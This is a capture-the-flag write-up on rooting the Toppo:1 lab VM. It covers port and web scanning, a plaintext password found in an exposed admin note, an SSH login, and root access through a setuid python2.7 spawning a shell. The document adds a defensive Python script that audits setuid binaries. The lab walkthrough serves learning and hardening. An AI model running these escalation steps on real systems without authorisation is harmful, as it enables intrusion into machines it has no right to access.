
This is a short write-up on how I gained root access on the vulnerable virtual machine Toppo: 1.

Target Discovery and Information Gathering

The target VM is running on the IP address 172.28.128.3. To get a first overview of which network services are listening, a simple port scan with nmap is done.

    hackbox> sudo nmap -sS -p 1-8080 172.28.128.3
    Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-13 19:20 CEST
    Nmap scan report for 172.28.128.3
    Host is up (0.00021s latency).
    Not shown: 8077 closed ports
    PORT    STATE SERVICE
    22/tcp  open  ssh
    80/tcp  open  http
    111/tcp open  rpcbind
    MAC Address: 08:00:27:52:40:DC (Oracle VirtualBox virtual NIC)

    Nmap done: 1 IP address (1 host up) scanned in 0.42 seconds

Only typical ports are found to be open: 22/tcp (SSH) and 80/tcp (HTTP). Connecting via SSH requires authentication, so there is no known way in yet. Let's take a look at the website served on port 80 instead. To analyze the directory structure, the HTTP headers in use and possible vulnerabilities, nikto is used.

    hackbox> nikto -nossl -host 172.28.128.3

    - Nikto v2.1.6

    ---

    - Target IP: 172.28.128.3
    - Target Hostname: 172.28.128.3
    - Target Port: 80
    - Start Time: 2018-07-13 19:14:37 (GMT2)

    ---

    - Server: Apache/2.4.10 (Debian)
    - Server leaks inodes via ETags, header found with file /, fields: 0x1925 0x563f5cf714e80
    - The anti-clickjacking X-Frame-Options header is not present.
    - The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
    - The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
    - No CGI Directories found (use '-C all' to force check all possible dirs)
    - Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
    - Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
    - OSVDB-3268: /admin/: Directory indexing found.
    - OSVDB-3092: /admin/: This might be interesting...
    - OSVDB-3268: /img/: Directory indexing found.
    - OSVDB-3092: /img/: This might be interesting...
    - OSVDB-3268: /mail/: Directory indexing found.
    - OSVDB-3092: /mail/: This might be interesting...
    - OSVDB-3092: /manual/: Web server manual found.
    - OSVDB-3268: /manual/images/: Directory indexing found.
    - OSVDB-3233: /icons/README: Apache default file found.
    - 7535 requests: 0 error(s) and 15 item(s) reported on remote host
    - End Time: 2018-07-13 19:14:48 (GMT2) (11 seconds)

    ---

    - 1 host(s) tested

Nikto found interesting directories with directory indexing enabled (the /admin/, /img/ and /mail/ lines in the output above). In the /admin/ directory a file named notes.txt with the following content can be found:

    Note to myself :

    I need to change my password :/ 12345ted123 is too outdated but the technology isn't my thing iprefer go fishing or watching soccer .

Privilege Escalation

So now we have a username and a password to log in via SSH. The user ted has no privileged rights, so we need to find another way to gain root access. First idea: look for setuid binaries that can be exploited.

    ted@Toppo:~$ find / -perm -u=s -type f 2>/dev/null
    /sbin/mount.nfs
    /usr/sbin/exim4
    /usr/lib/eject/dmcrypt-get-device
    /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /usr/lib/openssh/ssh-keysign
    /usr/bin/gpasswd
    /usr/bin/newgrp
    /usr/bin/python2.7
    /usr/bin/chsh
    /usr/bin/at
    /usr/bin/mawk
    /usr/bin/chfn
    /usr/bin/procmail
    /usr/bin/passwd
    /bin/su
    /bin/umount
    /bin/mount

Check! There are multiple binaries with the setuid bit set. /usr/bin/python2.7 and /usr/bin/mawk are especially interesting. mawk is an awk interpreter, but since I don't know much about awk, let's try python2.7.
To spawn a shell from python, the os module can be used. The shell we want to spawn is /bin/sh, which on this system is a symlink to /bin/dash.
Using /bin/sh we're able to gain root access and read /root/flag.txt to find the flag.

    ted@Toppo:~$ python
    Python 2.7.9 (default, Aug 13 2016, 16:41:35)
    [GCC 4.9.2] on linux2
    Type "help", "copyright", "credits" or "license" for more information.
    >>> import os
    >>> os.system("sh")
    # whoami
    root
    # ls /root
    flag.txt
    # cat /root/flag.txt
    _________                                  
    |  _   _  |                                 
    |_/ | | \_|.--.   _ .--.   _ .--.    .--.   
        | |  / .'`\ \[ '/'`\ \[ '/'`\ \/ .'`\ \ 
       _| |_ | \__. | | \__/ | | \__/ || \__. | 
      |_____| '.__.'  | ;.__/  | ;.__/  '.__.'  
                     [__|     [__|              



    Congratulations ! there is your flag : 0wnedlab{p4ssi0n_c0me_with_pract1ce}

Using /bin/bash for such an exploit will not work without an additional parameter, since by default bash drops the elevated privileges: it starts in the context of the real user, not the effective user.
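As an added example that is not part of the original write-up, here is the same setuid check from the defender's side: a small Python audit that walks the filesystem for setuid files and flags any interpreter (python, awk, shells and the like), plus anything missing from an assumed baseline of Debian-default setuid binaries. The baseline set, the interpreter list and the sample input are my own assumptions and constructions, not values taken from the VM.

```python
import os
import re
import stat

# Assumed baseline: setuid binaries a stock Debian 8 ships (build yours from a clean image).
EXPECTED_SUID = {
    "/sbin/mount.nfs", "/usr/sbin/exim4", "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper", "/usr/lib/openssh/ssh-keysign",
    "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/chsh", "/usr/bin/at", "/usr/bin/chfn",
    "/usr/bin/procmail", "/usr/bin/passwd", "/bin/su", "/bin/umount", "/bin/mount",
}

# Programs that run arbitrary user code; setuid on one of these hands out the owner's privileges.
INTERPRETER_RE = re.compile(
    r"^(python[0-9.]*|perl[0-9.]*|ruby[0-9.]*|lua[0-9.]*|php[0-9.]*|node"
    r"|[mgn]?awk|bash|sh|dash|zsh|ksh|vim?|nano|less|more|find|env)$"
)

def audit_suid(paths, baseline=EXPECTED_SUID):
    """Classify setuid file paths; return a list of (path, reason) findings."""
    findings = []
    for path in (p.strip() for p in paths if p.strip()):
        if INTERPRETER_RE.match(os.path.basename(path)):
            findings.append((path, "interpreter: arbitrary code runs as file owner"))
        elif path not in baseline:
            findings.append((path, "not in expected setuid baseline"))
    return findings

def find_suid_live(root="/"):
    """Walk the filesystem and return regular files with the setuid bit set (no root needed)."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return hits

# Constructed sample: an abridged copy of the `find / -perm -u=s -type f` output shown above.
SAMPLE_FIND_OUTPUT = ["/usr/bin/gpasswd", "/usr/bin/python2.7", "/usr/bin/at",
                      "/usr/bin/mawk", "/usr/bin/passwd"]

if __name__ == "__main__":
    for path, reason in audit_suid(find_suid_live("/") or SAMPLE_FIND_OUTPUT):
        print(f"{path}: {reason}")
```

Run on a live host it audits the real setuid set; a hit on the interpreter list is the condition the write-up exploits and is fixed with chmod u-s on the file.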

All in all, this was an easy VM to 'exploit'.